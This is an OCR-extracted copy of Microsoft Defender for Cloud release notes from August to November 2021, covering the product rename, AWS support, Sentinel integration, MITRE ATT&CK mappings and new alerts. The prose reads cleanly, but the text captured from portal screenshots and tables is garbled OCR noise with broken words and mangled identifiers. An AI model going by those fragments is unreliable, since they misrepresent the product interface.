e Prioritize security actions by data sensitivity (powered by Microsoft Purview) (in preview) 

e Expanded security control assessments with Azure Security Benchmark v3 

e Microsoft Sentinel connector's optional bi-directional alert synchronization released for general 
availability (GA) 

e New recommendation to push Azure Kubernetes Service (AKS) logs to Sentinel 


e Recommendations mapped to the MITRE ATT&CK® framework - released for general availability 
(GA) 


Other changes in November include: 


e Microsoft Threat and Vulnerability Management added as vulnerability assessment solution - 
released for general availability (GA) 

e Microsoft Defender for Endpoint for Linux now supported by Microsoft Defender for Servers - 
released for general availability (GA) 

e Snapshot export for recommendations and security findings (in preview) 

e Auto provisioning of vulnerability assessment solutions released for general availability (GA) 

e Software inventory filters in asset inventory released for general availability (GA) 

e New AKS security policy added to default initiative — for use by private preview customers only 


e Inventory display of on-premises machines applies different template for resource name 


Azure Security Center and Azure Defender become Microsoft 
Defender for Cloud 


According to the 2021 State of the Cloud report”, 92% of organizations now have a multicloud 
strategy. At Microsoft, our goal is to centralize security across these environments and help security 
teams work more effectively. 


Microsoft Defender for Cloud (formerly known as Azure Security Center and Azure Defender) is a 
Cloud Security Posture Management (CSPM) and cloud workload protection (CWP) solution that 
discovers weaknesses across your cloud configuration, helps strengthen the overall security posture of 
your environment, and protects workloads across multicloud and hybrid environments. 


At Ignite 2019, we shared our vision to create the most complete approach for securing your digital 
estate and integrating XDR technologies under the Microsoft Defender brand. Unifying Azure Security 
Center and Azure Defender under the new name Microsoft Defender for Cloud, reflects the integrated 


capabilities of our security offering and our ability to support any cloud platform. 


Native CSPM for AWS and threat protection for Amazon EKS, and 
AWS EC2 


A new environment settings page provides greater visibility and control over your management 
groups, subscriptions, and AWS accounts. The page is designed to onboard AWS accounts at scale: 
connect your AWS management account, and you'll automatically onboard existing and future 


accounts. 


ili Microsoft Defender for Cloud | Environment settings 


Showing 72 subscriptions 


| P Search (Ctrl+/) | ‘ -+ Add environment v Refresh 
General & Amazon Web Services 

(preview) d O 7 
Ọ Overview Azure subscriptions AWS accounts 


@ Getting started i) Welcome to the new multi-cloud account management page (preview). 


=> Recommendations 
D Security alerts |P Search by name 
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E workbooks 
WV © Azure 


GA Communi 
E > D) 72698 (21 of 22 subscriptions) 


Diagnose and solve problems 
d 9 E b & AWS (preview) 


Cloud Security E daa 
Ọ Secure Score EZ ked 
B Regulatory compliance > EJ Mas 
Q workload protections BM sec 


= Firewall Manager 


Management 


ili Environment settings 
Security solutions 


ZO Workflow automation 


When you've added your AWS accounts, Defender for Cloud protects your AWS resources with any or 
all of the following plans: 


e Defender for Cloud's CSPM features extend to your AWS resources. This agentless plan assesses 
your AWS resources according to AWS-specific security recommendations and these are included 
in your secure score. The resources will also be assessed for compliance with built-in standards 
specific to AWS (AWS CIS, AWS PCI DSS, and AWS Foundational Security Best Practices). Defender 
for Cloud's asset inventory page is a multicloud enabled feature helping you manage your AWS 
resources alongside your Azure resources. 

e Microsoft Defender for Kubernetes extends its container threat detection and advanced 
defenses to your Amazon EKS Linux clusters. 

e Microsoft Defender for Servers brings threat detection and advanced defenses to your Windows 
and Linux EC2 instances. This plan includes the integrated license for Microsoft Defender for 
Endpoint, security baselines and OS level assessments, vulnerability assessment scanning, 
adaptive application controls (AAC), file integrity monitoring (FIM), and more. 


Learn more about connecting your AWS accounts to Microsoft Defender for Cloud. 


Prioritize security actions by data sensitivity (powered by Microsoft 
Purview) (in preview) 


Data resources remain a popular target for threat actors. So it's crucial for security teams to identify, 
prioritize, and secure sensitive data resources across their cloud environments. 


To address this challenge, Microsoft Defender for Cloud now integrates sensitivity information from 
Microsoft Purview. Microsoft Purview is a unified data governance service that provides rich insights 
into the sensitivity of your data within multicloud, and on-premises workloads. 


The integration with Microsoft Purview extends your security visibility in Defender for Cloud from the 
infrastructure level down to the data, enabling an entirely new way to prioritize resources and security 


activities for your security teams. 


Learn more in Prioritize security actions by data sensitivity. 


Expanded security control assessments with Azure Security 
Benchmark v3 


Microsoft Defender for Cloud's security recommendations are enabled and supported by the Azure 


Security Benchmark. 


Azure Security Benchmark is the Microsoft-authored, Azure-specific set of guidelines for security and 
compliance best practices based on common compliance frameworks. This widely respected 
benchmark builds on the controls from the Center for Internet Security (CIS) and the National 


Institute of Standards and Technology (NIST) Z with a focus on cloud-centric security. 


From Ignite 2021, Azure Security Benchmark v3 is available in Defender for Cloud's regulatory 
compliance dashboard and enabled as the new default initiative for all Azure subscriptions protected 
with Microsoft Defender for Cloud. 


Enhancements for v3 include: 
e Additional mappings to industry frameworks PCI-DSS v3.2.1% and CIS Controls v8 Z. 


e More granular and actionable guidance for controls with the introduction of: 
o Security Principles - Providing insight into the overall security objectives that build the 
foundation for our recommendations. 
o Azure Guidance - The technical “how-to” for meeting these objectives. 


e New controls include DevOps security for issues such as threat modeling and software supply 
chain security, as well as key and certificate management for best practices in Azure. 


Learn more in Introduction to Azure Security Benchmark. 


Microsoft Sentinel connector's optional bi-directional alert 
synchronization released for general availability (GA) 


In July, we announced a preview feature, bi-directional alert synchronization, for the built-in 
connector in Microsoft Sentinel (Microsoft's cloud-native SIEM and SOAR solution). This feature is now 


released for general availability (GA). 


When you connect Microsoft Defender for Cloud to Microsoft Sentinel, the status of security alerts is 
synchronized between the two services. So, for example, when an alert is closed in Defender for Cloud, 
that alert will display as closed in Microsoft Sentinel as well. Changing the status of an alert in 
Defender for Cloud won't affect the status of any Microsoft Sentinel incidents that contain the 
synchronized Microsoft Sentinel alert, only that of the synchronized alert itself. 


When you enable bi-directional alert synchronization you'll automatically sync the status of the 
original Defender for Cloud alerts with Microsoft Sentinel incidents that contain the copies of those 
Defender for Cloud alerts. So, for example, when a Microsoft Sentinel incident containing a Defender 


for Cloud alert is closed, Defender for Cloud will automatically close the corresponding original alert. 


Learn more in Connect Azure Defender alerts from Azure Security Center and Stream alerts to Azure 


Sentinel. 


New recommendation to push Azure Kubernetes Service (AKS) logs 
to Sentinel 


In a further enhancement to the combined value of Defender for Cloud and Microsoft Sentinel, we'll 
now highlight Azure Kubernetes Service instances that aren't sending log data to Microsoft Sentinel. 


SecOps teams can choose the relevant Microsoft Sentinel workspace directly from the 
recommendation details page and immediately enable the streaming of raw logs. This seamless 
connection between the two products makes it easy for security teams to ensure complete logging 


coverage across their workloads to stay on top of their entire environment. 


The new recommendation, "Diagnostic logs in Kubernetes services should be enabled" includes the 
'Fix' option for faster remediation. 


We've also enhanced the "Auditing on SQL server should be enabled" recommendation with the same 


Sentinel streaming capabilities. 


Recommendations mapped to the MITRE ATT&CK® framework - 
released for general availability (GA) 


We've enhanced Defender for Cloud's security recommendations to show their position on the MITRE 
ATT&CK® framework. This globally accessible knowledge base of threat actors’ tactics and techniques 
based on real-world observations, provides more context to help you understand the associated risks 


of the recommendations for your environment. 
You'll find these tactics wherever you access recommendation information: 


e Azure Resource Graph query results for relevant recommendations include the MITRE ATT&CK ® 
tactics and techniques. 


e Recommendation details pages show the mapping for all relevant recommendations: 


Management ports should be closed on your virtual machines x 


GO Exempt C: View policy definition ay Open query 


Severity Freshness interval Tactics and techniques 


aiani D 24 Hours FJ Initial Access 
= e 


ai 
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Open remote manageme 


attempt to brute force ct EZ initial Access Read more (7 
E SO 


v Remediation steps External Remote Services (T7133) 7 


^ Affected resources 


e The recommendations page in Defender for Cloud has a new filter to select 


recommendations according to their associated tactic: 


Learn more in Review your security recommendations. 


Microsoft Threat and Vulnerability Management added as 
vulnerability assessment solution - released for general availability 
(GA) 


In October, we announced an extension to the integration between Microsoft Defender for Servers and 
Microsoft Defender for Endpoint, to support a new vulnerability assessment provider for your 
machines: Microsoft threat and vulnerability management. This feature is now released for general 
availability (GA). 


Use threat and vulnerability management to discover vulnerabilities and misconfigurations in near 
real time with the integration with Microsoft Defender for Endpoint enabled, and without the need for 
additional agents or periodic scans. Threat and vulnerability management prioritizes vulnerabilities 


based on the threat landscape and detections in your organization. 


Use the security recommendation "A vulnerability assessment solution should be enabled on your 
virtual machines Z " to surface the vulnerabilities detected by threat and vulnerability management for 
your supported machines. 


To automatically surface the vulnerabilities, on existing and new machines, without the need to 
manually remediate the recommendation, see Vulnerability assessment solutions can now be auto 
enabled (in preview). 


Learn more in Investigate weaknesses with Microsoft Defender for Endpoint's threat and vulnerability 
management. 


Microsoft Defender for Endpoint for Linux now supported by 
Microsoft Defender for Servers - released for general availability 
(GA) 


In August, we announced preview support for deploying the Defender for Endpoint for Linux sensor to 
supported Linux machines. This feature is now released for general availability (GA). 


Microsoft Defender for Servers includes an integrated license for Microsoft Defender for Endpoint Z. 
Together, they provide comprehensive endpoint detection and response (EDR) capabilities. 


When Defender for Endpoint detects a threat, it triggers an alert. The alert is shown in Defender for 
Cloud. From Defender for Cloud, you can also pivot to the Defender for Endpoint console, and perform 
a detailed investigation to uncover the scope of the attack. 


Learn more in Protect your endpoints with Security Center's integrated EDR solution: Microsoft 
Defender for Endpoint. 


Snapshot export for recommendations and security findings (in 
preview) 


Defender for Cloud generates detailed security alerts and recommendations. You can view them in the 
portal or through programmatic tools. You might also need to export some or all of this information 


for tracking with other monitoring tools in your environment. 


Defender for Cloud's continuous export feature lets you fully customize what will be exported, and 
where it will go. Learn more in Continuously export Microsoft Defender for Cloud data. 


Even though the feature is called continuous, there's also an option to export weekly snapshots. Until 
now, these weekly snapshots were limited to secure score and regulatory compliance data. We've 
added the capability to export recommendations and security findings. 


Auto provisioning of vulnerability assessment solutions released 
for general availability (GA) 


In October, we announced the addition of vulnerability assessment solutions to Defender for Cloud's 
auto provisioning page. This is relevant to Azure virtual machines and Azure Arc machines on 
subscriptions protected by Azure Defender for Servers. This feature is now released for general 
availability (GA). 


If the integration with Microsoft Defender for Endpoint is enabled, Defender for Cloud presents a 
choice of vulnerability assessment solutions: 


e (NEW) The Microsoft threat and vulnerability management module of Microsoft Defender for 
Endpoint (see the release note) 
e The integrated Qualys agent 


Your chosen solution will be automatically enabled on supported machines. 


Learn more in Automatically configure vulnerability assessment for your machines. 


Software inventory filters in asset inventory released for general 
availability (GA) 


In October, we announced new filters for the asset inventory page to select machines running specific 
software - and even specify the versions of interest. This feature is now released for general availability 
(GA). 


You can query the software inventory data in Azure Resource Graph Explorer. 
To use these features, you'll need to enable the integration with Microsoft Defender for Endpoint. 


For full details, including sample Kusto queries for Azure Resource Graph, see Access a software 
inventory. 


New AKS security policy added to default initiative — for use by 
private preview customers only 


To ensure that Kubernetes workloads are secure by default, Defender for Cloud includes Kubernetes 
level policies and hardening recommendations, including enforcement options with Kubernetes 


admission control. 


As part of this project, we've added a policy and recommendation (disabled by default) for gating 
deployment on Kubernetes clusters. The policy is in the default initiative but is only relevant for 
organizations who register for the related private preview. 


You can safely ignore the policies and recommendation ("Kubernetes clusters should gate deployment 


of vulnerable images") and there will be no impact on your environment. 


If you'd like to participate in the private preview, you'll need to be a member of the private preview 
ring. If you're not already a member, submit a request here“. Members will be notified when the 
preview begins. 


Inventory display of on-premises machines applies different 
template for resource name 


To improve the presentation of resources in the Asset inventory, we've removed the "source-computer- 


IP" element from the template for naming on-premises machines. 


e Previous format: machine-name_source-computer-id_VMUUID 


e From this update: machine-name_VMUUID 


October 2021 


Updates in October include: 


e Microsoft Threat and Vulnerability Management added as vulnerability assessment solution (in 
preview) 


e Vulnerability assessment solutions can now be auto enabled (in preview) 


e Software inventory filters added to asset inventory (in preview) 

e Changed prefix of some alert types from ARM to "VM_" 

e Changes to the logic of a security recommendation for Kubernetes clusters 
e Recommendations details pages now show related recommendations 

e New alerts for Azure Defender for Kubernetes (in preview) 


Microsoft Threat and Vulnerability Management added as 
vulnerability assessment solution (in preview) 


We've extended the integration between Azure Defender for Servers and Microsoft Defender for 
Endpoint, to support a new vulnerability assessment provider for your machines: Microsoft threat and 
vulnerability management. 


Use threat and vulnerability management to discover vulnerabilities and misconfigurations in near 
real time with the integration with Microsoft Defender for Endpoint enabled, and without the need for 
additional agents or periodic scans. Threat and vulnerability management prioritizes vulnerabilities 
based on the threat landscape and detections in your organization. 


Use the security recommendation "A vulnerability assessment solution should be enabled on your 
virtual machines Z " to surface the vulnerabilities detected by threat and vulnerability management for 
your supported machines. 


To automatically surface the vulnerabilities, on existing and new machines, without the need to 
manually remediate the recommendation, see Vulnerability assessment solutions can now be auto 


enabled (in preview). 


Learn more in Investigate weaknesses with Microsoft Defender for Endpoint's threat and vulnerability 


management. 


Vulnerability assessment solutions can now be auto enabled (in 
preview) 


Security Center's auto provisioning page now includes the option to automatically enable a 
vulnerability assessment solution to Azure virtual machines and Azure Arc machines on subscriptions 
protected by Azure Defender for Servers. 


If the integration with Microsoft Defender for Endpoint is enabled, Defender for Cloud presents a 
choice of vulnerability assessment solutions: 


e (NEW) The Microsoft threat and vulnerability management module of Microsoft Defender for 
Endpoint (see the release note) 
e The integrated Qualys agent 


Auto provisioning - Extensions Extension deployment configuration x 


Vulnerability assessment solution for Azure Machines and Azure Arc enabled machines 


Microsoft Defender for Cloud collects security data and events from your resources and 
When you enable an extension, it will be installed on any new or existing resource, b 
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Show in 
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Your chosen solution will be automatically enabled on supported machines. 


Learn more in Automatically configure vulnerability assessment for your machines. 


Software inventory filters added to asset inventory (in preview) 


The asset inventory page now includes a filter to select machines running specific software - and even 
specify the versions of interest. 


Additionally, you can query the software inventory data in Azure Resource Graph Explorer. 
To use these new features, you'll need to enable the integration with Microsoft Defender for Endpoint. 


For full details, including sample Kusto queries for Azure Resource Graph, see Access a software 


IIIEIIST EEIen 


inventory. 
Filter by name Subscriptions == Partners ASC_Demo Installed applications == All X | Tr Add filter 
Total Resources Unhealthy Resources Unmonitore Installed applications 
a 30 E, 22 % 0 Filter Installed applications bai 
Operator | == 7v 
[C] Resource name Ty Resource type Ty 
Value 3 selected A^ 
o > asc-workload-protection Kubernetes services 
oD $> asc-demo-cluster Kubernetes services EO 
er EEE eea 
ME Virtual machines 
rewire. E (Blank) (29) 
JI E vm4 Virtual machines Partners_AS — 
LJ 7-zip 7-zip (1) 
II E m Virtual machines Partners_AS 
a Microsoft .net Framework (1) 
T ? Partners ASC_Demo Subscription Partners_AS — 
Corel Winzip (1) 
o E demovm1 Virtual machines Partners_AS 
D Oracle Mysql Connector/c (1) 
o E uro Virtual machines Partners_AS 
@ Oracle Mysql (1) 
go E mi Virtual machines Partners AS m~ 
Oracle Mysql Connector/j (1) 
o E, datrigan-server SQL servers Partners AS m ` 
|_| Microsoft Windows Server 2019 (1) 
KA aks-agentpool-41100544-0 Virtual machines Partners AS — 
0 ebo = A Microsoft Windows Defender (1) 
JI j= ascdemol Storage accounts Partners AS m 
L Microsoft Internet Explorer (1) 
ascdemoregist Container registries Partners AS 
0 ba bad 9 @ Oracle Mysq| Installer (1) 
ascdemoregistry3 Container registries Partners AS rro 
0 pa ZE 9 ~ |] Adobe Acrobat Reader Dc (1) 


Changed prefix of some alert types from "ARM_" to "VM_" 


In July 2021, we announced a logical reorganization of Azure Defender for Resource Manager alerts 


As part of a logical reorganization of some of the Azure Defender plans, we moved twenty-one alerts 
from Azure Defender for Resource Manager to Azure Defender for Servers. 


With this update, we've changed the prefixes of these alerts to match this reassignment and replaced 
"ARM_" with "VM_" as shown in the following table: 


Original name 

ARM_AmBroadFilesExclusion 
ARM_AmDisablementAndCodeExecution 
ARM_AmDisablement 
ARM_AmFileExclusionAndCodeExecution 
ARM_AmTempFileExclusionAndCodeExecution 
ARM_AmTempFileExclusion 
ARM_AmkRealtimeProtectionDisabled 
ARM_AmTempRealtimeProtectionDisablement 
ARM_AmkRealtimeProtectionDisablementAndCodeExec 
ARM_AmMalwareCampaignRelatedExclusion 
ARM_AmTemporarilyDisablement 
ARM_UnusualAmFileExclusion 
ARM_CustomScriptExtensionSuspiciousCmd 
ARM_CustomScriptExtensionSuspiciousEntryPoint 
ARM_CustomScriptExtensionSuspiciousPayload 
ARM_CustomScriptExtensionSuspiciousFailure 
ARM_CustomScriptExtensionUnusualDeletion 
ARM_CustomScriptExtensionUnusualExecution 
ARM_VMAccessUnusualConfigReset 
ARM_VMAccessUnusualPasswordReset 


ARM_VMAccessUnusualSSHReset 


From this change 
VM_AmBroadFilesExclusion 
VM_AmDisablementAndCodeExecution 
VM_AmDisablement 
VM_AmFileExclusionAndCodeExecution 
VM_AmTempFileExclusionAndCodeExecution 
VM_AmTempFileExclusion 
VM_AmRealtimeProtectionDisabled 
VM_AmTempRealtimeProtectionDisablement 
VM_AmRealtimeProtectionDisablementAndCodeExec 
VM_AmMalwareCampaignRelatedExclusion 
VM_AmTemporarilyDisablement 
VM_UnusualAmFileExclusion 
VM_CustomScriptExtensionSuspiciousCmd 
VM_CustomScriptExtensionSuspiciousEntryPoint 
VM_CustomScriptExtensionSuspiciousPayload 
VM_CustomScriptExtensionSuspiciousFailure 
VM_CustomScriptExtensionUnusualDeletion 
VM_CustomScriptExtensionUnusualExecution 
VM_VMAccessUnusualConfigReset 
VM_VMAccessUnusualPasswordReset 


VM_VMAccessUnusualSSHReset 


Learn more about the Azure Defender for Resource Manager and Azure Defender for Servers plans. 


Changes to the logic of a security recommendation for Kubernetes 


clusters 


The recommendation "Kubernetes clusters should not use the default namespace" prevents usage of 
the default namespace for a range of resource types. Two of the resource types that were included in 
this recommendation have been removed: ConfigMap and Secret. 


Learn more about this recommendation and hardening your Kubernetes clusters in Understand Azure 
Policy for Kubernetes clusters. 


Recommendations details pages now show related 
recommendations 


To clarify the relationships between different recommendations, we've added a Related 
recommendations area to the details pages of many recommendations. 


The three relationship types that are shown on these pages are: 


e Prerequisite - A recommendation that must be completed before the selected recommendation 

e Alternative - A different recommendation which provides another way of achieving the goals of 
the selected recommendation 

e Dependent - A recommendation for which the selected recommendation is a prerequisite 


For each related recommendation, the number of unhealthy resources is shown in the "Affected 


resources” column. 


Q Tip 
If a related recommendation is grayed out, its dependency isn't yet completed and so isn't 
available. 

An example of related recommendations: 


1. Security Center checks your machines for supported vulnerability assessment solutions: 
A vulnerability assessment solution should be enabled on your virtual machines 


2. If one is found, you'll get notified about discovered vulnerabilities: 
Vulnerabilities in your virtual machines should be remediated 


Obviously, Security Center can't notify you about discovered vulnerabilities unless it finds a supported 


vulnerability assessment solution. 
Therefore: 


e Recommendation #1 is a prerequisite for recommendation #2 
e Recommendation #2 depends upon recommendation #1 


A vulnerability assessment solution should be enabled on your virtual machines 
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New alerts for Azure Defender for Kubernetes (in preview) 


To expand the threat protections provided by Azure Defender for Kubernetes, we've added two 


preview alerts. 


These alerts are generated based on a new machine learning model and Kubernetes advanced 
analytics, measuring multiple deployment and role assignment attributes against previous activities in 
the cluster and across all clusters monitored by Azure Defender. 


Alert (alert type) Description MITRE Severity 
tactic 

Anomalous pod deployment (Preview) Kubernetes audit log analysis detected pod Execution Medium 

(K8S_AnomalousPodDeployment) deployment that is anomalous based on 


previous pod deployment activity. This activity 
is considered an anomaly when taking into 
account how the different features seen in the 
deployment operation are in relations to one 
another. The features monitored by this 
analytics include the container image registry 
used, the account performing the deployment, 
day of the week, how often does this account 


Alert (alert type) Description MITRE Severity 
tactic 


performs pod deployments, user agent used in 
the operation, is this a namespace which is 
pod deployment occur to often, or other 
feature. Top contributing reasons for raising 
this alert as anomalous activity are detailed 
under the alert extended properties. 


Excessive role permissions assigned in Analysis of the Kubernetes audit logs detected Privilege Low 
Kubernetes cluster (Preview) an excessive permissions role assignment to Escalation 
(K8S_ServiceAcountPermissionAnomaly) your cluster. From examining role 

assignments, the listed permissions are 

uncommon to the specific service account. 

This detection considers previous role 

assignments to the same service account 

across clusters monitored by Azure, volume 

per permission, and the impact of the specific 

permission. The anomaly detection model 

used for this alert takes into account how this 

permission is used across all clusters 

monitored by Azure Defender. 


For a full list of the Kubernetes alerts, see Alerts for Kubernetes clusters. 


September 2021 


In September, the following update was released: 


Two new recommendations to audit OS configurations for Azure 
security baseline compliance (in preview) 


The following two recommendations have been released to assess your machines' compliance with the 
Windows security baseline and the Linux security baseline: 


e For Windows machines, Vulnerabilities in security configuration on your Windows machines 
should be remediated (powered by Guest Configuration) Z 

e For Linux machines, Vulnerabilities in security configuration on your Linux machines should be 
remediated (powered by Guest Configuration) Z 


These recommendations make use of the guest configuration feature of Azure Policy to compare the 
OS configuration of a machine with the baseline defined in the Azure Security Benchmark. 


Learn more about using these recommendations in Harden a machine's OS configuration using guest 
configuration. 


August 2021 


Updates in August include: 


e Microsoft Defender for Endpoint for Linux now supported by Azure Defender for Servers (in 
preview) 

e Two new recommendations for managing endpoint protection solutions (in preview) 

e Built-in troubleshooting and guidance for solving common issues 

e Regulatory compliance dashboard's Azure Audit reports released for general availability (GA) 

e Deprecated recommendation 'Log Analytics agent health issues should be resolved on your 
machines’ 

e Azure Defender for container registries now scans for vulnerabilities in registries protected with 
Azure Private Link 

e Security Center can now auto provision the Azure Policy's Guest Configuration extension (in 
preview) 

e Recommendations to enable Azure Defender plans now support "Enforce" 

e CSV exports of recommendation data now limited to 20 MB 

e Recommendations page now includes multiple views 


Microsoft Defender for Endpoint for Linux now supported by Azure 
Defender for Servers (in preview) 


Azure Defender for Servers includes an integrated license for Microsoft Defender for Endpoint Z . 
Together, they provide comprehensive endpoint detection and response (EDR) capabilities. 


When Defender for Endpoint detects a threat, it triggers an alert. The alert is shown in Security Center. 
From Security Center, you can also pivot to the Defender for Endpoint console, and perform a detailed 
investigation to uncover the scope of the attack. 


During the preview period, you'll deploy the Defender for Endpoint for Linux sensor to supported Linux 
machines in one of two ways depending on whether you've already deployed it to your Windows 


machines: 


e Existing users with Defender for Cloud's enhanced security features enabled and Microsoft 
Defender for Endpoint for Windows 
e New users who have never enabled the integration with Microsoft Defender for Endpoint for 


Windows 


Learn more in Protect your endpoints with Security Center's integrated EDR solution: Microsoft 


Defender for Endpoint. 


Two new recommendations for managing endpoint protection 
solutions (in preview) 


We've added two preview recommendations to deploy and maintain the endpoint protection solutions 
on your machines. Both recommendations include support for Azure virtual machines and machines 
connected to Azure Arc-enabled servers. 


Recommendation Description Severity 


Endpoint protection should be To protect your machines from threats and vulnerabilities, install a High 
installed on your machines E supported endpoint protection solution. 


Recommendation 


Endpoint protection health 
issues should be resolved on 
your machines #7 


© Note 


Description Severity 


Learn more about how Endpoint Protection for machines is evaluated. 
(Related policy: Monitor missing Endpoint Protection in Azure 
Security Center £ ) 


Resolve endpoint protection health issues on your virtual machines to Medium 
protect them from latest threats and vulnerabilities. Azure Security 

Center supported endpoint protection solutions are documented 

here. Endpoint protection assessment is documented here. 

(Related policy: Monitor missing Endpoint Protection in Azure 

Security Center  ) 


The recommendations show their freshness interval as 8 hours, but there are some scenarios in 


which this might take significantly longer. For example, when an on premises machine is deleted, 
it takes 24 hours for Security Center to identify the deletion. After that, the assessment will take up 


to 8 hours to return the information. In that specific situation therefore, it may take 32 hours for 


the machine to be removed from the list of affected resources. 


Endpoint protection should be installed on your machines 


GA Exempt CG view policy definition era Open query 


Severity 


| High 


Freshness interval 


(4) 8 Hours 


Built-in troubleshooting and guidance for solving common issues 


A new, dedicated area of the Security Center pages in the Azure portal provides a collated, ever- 


growing set of self-help materials for solving common challenges with Security Center and Azure 


Defender. 


When you're facing an issue, or are seeking advice from our support team, Diagnose and solve 


problems is another tool to help you find the solution: 


Z Microsoft Defender for Cloud | Diagnose and solve problems 


Showing 54 subscriptions 


[e Search (Ctrl+/) | « 


General 


OO 


4 Diagnose and solve problems 


Overview 

Getting started 
Recommendations 
Security alerts 
Inventory 
Workbooks 


Community 


Cloud Security 


Secure Score 


Regulatory compliance 
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z 


Firewall Manager 


Management 


E 
{s 


Pricing & settings 
Security policy 
Security solutions 


Workflow automation 


| Æ Search for common problems, tools and more 


Common problems 


Explore the most common problems for your resource. Select Troubleshoot to run an automated troubleshooter, 
follow do-it-yourself troubleshooting steps, or explore a wide range of troubleshooting tools. 


Category = All (7) I Group by category 


Microsoft Defender Features 


Adaptive Application Control (AAC). Just-in-time Access (JIT), 


File Integrity Monitoring (FIM), Vulnerability Assessme... 
Troubleshoot 


Portal and UI 


For any unexpected display of the Graphical User Interface (UI) 


Troubleshoot 


Recommendations operations and management 


Recommendations exemptions, Enforce or Deny, Custom 
Recommendations issues, Compliance assignments, Sec... 


Troubleshoot 


Security Alerts Investigation 


Questions and issues regarding security alerts 


Troubleshoot 


Onboarding f 
Onboarding or offboarding ASC 


Troubleshoot 


Pricing, Billing and Usage 
Data usage, billing queries and pricing issues 


Troubleshoot 


Recommendations remediation 


Recommendation description, remediation steps or reasons 
are unclear, recommendation resources wrongly indicated 


Troubleshoot 


Settings and configurations issues 


Questions regarding the various Microsoft Defender for Cloud 
settings and configurations 
Troubleshoot 


Regulatory compliance dashboard's Azure Audit reports released 
for general availability (GA) 


The regulatory compliance dashboard's toolbar offers Azure and Dynamics certification reports for the 


standards applied to your subscriptions. 


9 


4 Download report 


Showing 2 subscriptions 


C: Manage compliance policies BO Open query 


Microsoft Defender for Cloud | Regulatory compliance 


Audit reports EA Compliance over time workbook 


You can select the tab for the relevant reports types (PCI, SOC, ISO, and others) and use filters to find 


the specific reports you need. 


For more information, see Generate compliance status reports and certificates. 


Audit reports 


D Search report Region : All 7 selected ZA Industry : All 


Title Ty Downloat n Standard 
E e Select all 5 
Microsoft Azure Dynamics 365 and Online d Downl it report for demonstrating Microsoft Azure, Dynamics 365 1SO27001 
Services - ISO 27001 27018 27017 27701 Regulatory standard 27701 (PIMS) frameworks. S027018, 
Assessment Report 12.2.2020 S027701 
$020000-1 
Microsoft Azure Dynamics 365 and Online d Downl demonstrating Microsoft Azure, Dynamics 365, and Other 15027001 
Services - IS027001 and 27701 Certificate ~] 5022301 n Management Systems) framework. S027701 
12.18.202 
A D 1s027001 
Microsoft Azure Dynamics 365 and Online d Downi iv] 5027017 demonstrating Microsoft Azure, Dynamics 365, and Other 1S027017 
Services - ISO 27017 Certificate 12.18.2020 
D soz7018 
Microsoft Azure Dynamics 365 and Online d Downl PO 5027701 demonstrating Microsoft Azure, Dynamics 365, and Other 15027018 
Services - ISO 27018 Certificate 12.18.2020 Mv) 
$09001 
Microsoft Azure + Dynamics 365 and d Download Certificate demonstrating Microsoft Azure, Dynamics 365, and Other 15027001 
Other Online Services - IS027001 and Information Management Systems) framework. $027701 
g y 


27701 Certificate - 8.13.2020 


Deprecated recommendation 'Log Analytics agent health issues 
should be resolved on your machines' 


We've found that recommendation Log Analytics agent health issues should be resolved on your 
machines impacts secure scores in ways that are inconsistent with Security Center's Cloud Security 
Posture Management (CSPM) focus. Typically, CSPM relates to identifying security misconfigurations. 
Agent health issues don't fit into this category of issues. 


Also, the recommendation is an anomaly when compared with the other agents related to Security 
Center: this is the only agent with a recommendation related to health issues. 


The recommendation has been deprecated. 


As a result of this deprecation, we've also made minor changes to the recommendations for installing 
the Log Analytics agent (Log Analytics agent should be installed on...). 


It's likely that this change will impact your secure scores. For most subscriptions, we expect the change 
to lead to an increased score, but it's possible the updates to the installation recommendation might 


result in decreased scores in some cases. 


Q Tip 


The asset inventory page was also affected by this change as it displays the monitored status for 
machines (monitored, not monitored, or partially monitored - a state which refers to an agent 
with health issues). 


Azure Defender for container registries now scans for 
vulnerabilities in registries protected with Azure Private Link 


Azure Defender for container registries includes a vulnerability scanner to scan images in your Azure 
Container Registry registries. Learn how to scan your registries and remediate findings in Use Azure 
Defender for container registries to scan your images for vulnerabilities. 


To limit access to a registry hosted in Azure Container Registry, assign virtual network private IP 
addresses to the registry endpoints and use Azure Private Link as explained in Connect privately to an 


Azure container registry using Azure Private Link. 


As part of our ongoing efforts to support additional environments and use cases, Azure Defender now 
also scans container registries protected with Azure Private Link. 


Security Center can now auto provision the Azure Policy's Guest 
Configuration extension (in preview) 


Azure Policy can audit settings inside a machine, both for machines running in Azure and Arc 
connected machines. The validation is performed by the Guest Configuration extension and client. 
Learn more in Understand Azure Policy's Guest Configuration. 


With this update, you can now set Security Center to automatically provision this extension to all 


supported machines. 


a Settings | Auto provisioning 


Contoso 
D Search (Ctri+/) | « Save 
Settings 


a e Auto provisioning - Extensions 


Cloud plans 
BE Se Microsoft Defender for Cloud collects security data and events from your resources and services to help you prevent, detect, and respond to threats. 
= Auto provisioning When you enable an extension, it will be installed on any new or existing resource, by assigning a security policy. Learn more 
@ Email notifications 


Enable all extensions 
GO Integrations 


GA Workflow automation 
E Continuous export Extension Status Resources missing extension Description Configuration 


@ Cloud connectors 


Collects security-related configurations and Selected workspace: nsg 


" e Vi from the machine and stores the S / events: Common 
Log Analytics agent for Azure VMs On 0 of 33 virtual machines vent logs 3 
g y g ZEA ma ilitia data in your Log Analytics workspace for Edit configuration 
analysis. Learn more 
P È 7 You can collect and store network traffic data 
Microsoft Dependency agent (preview) ( ) Off 2 vil 
E cy ag (p ) O b 15 of 32 virtual machines by onboarding to the VM Insights service. 
Show in inventory Learn more 
Extends Gatekeeper v3, to apply at-scale 
Policy Add-on for Kubernetes @ ) Off d 1 of 1 managed cluster AECE ib aia i a 
— in a centralized, consistent manner. 
Show in inventory Requires Kubermetes v1.14.0 or later. 


Learn more. 


Checks machines running in Azure and Arc 
Connected Machines for security 
misconfigurations. Settings such as 
configuration of the operating system, 
application configurations, and environment 
settings are all validated. To learn more, see 
Understand Azure Policy's Guest 
Configuration. 


Guest Configuration agent (preview) EZ 2 of 34 virtual machines 
Show in inventory 


Learn more about how auto provisioning works in Configure auto provisioning for agents and 


extensions. 


Recommendations to enable Azure Defender plans now support 
"Enforce" 


Security Center includes two features that help ensure newly created resources are provisioned in a 
secure manner: enforce and deny. When a recommendation offers these options, you can ensure your 


security requirements are met whenever someone attempts to create a resource: 


e Deny stops unhealthy resources from being created 
e Enforce automatically remediates non-compliant resources when they're created 


With this update, the enforce option is now available on the recommendations to enable Azure 
Defender plans (such as Azure Defender for App Service should be enabled, Azure Defender for Key 
Vault should be enabled, Azure Defender for Storage should be enabled). 


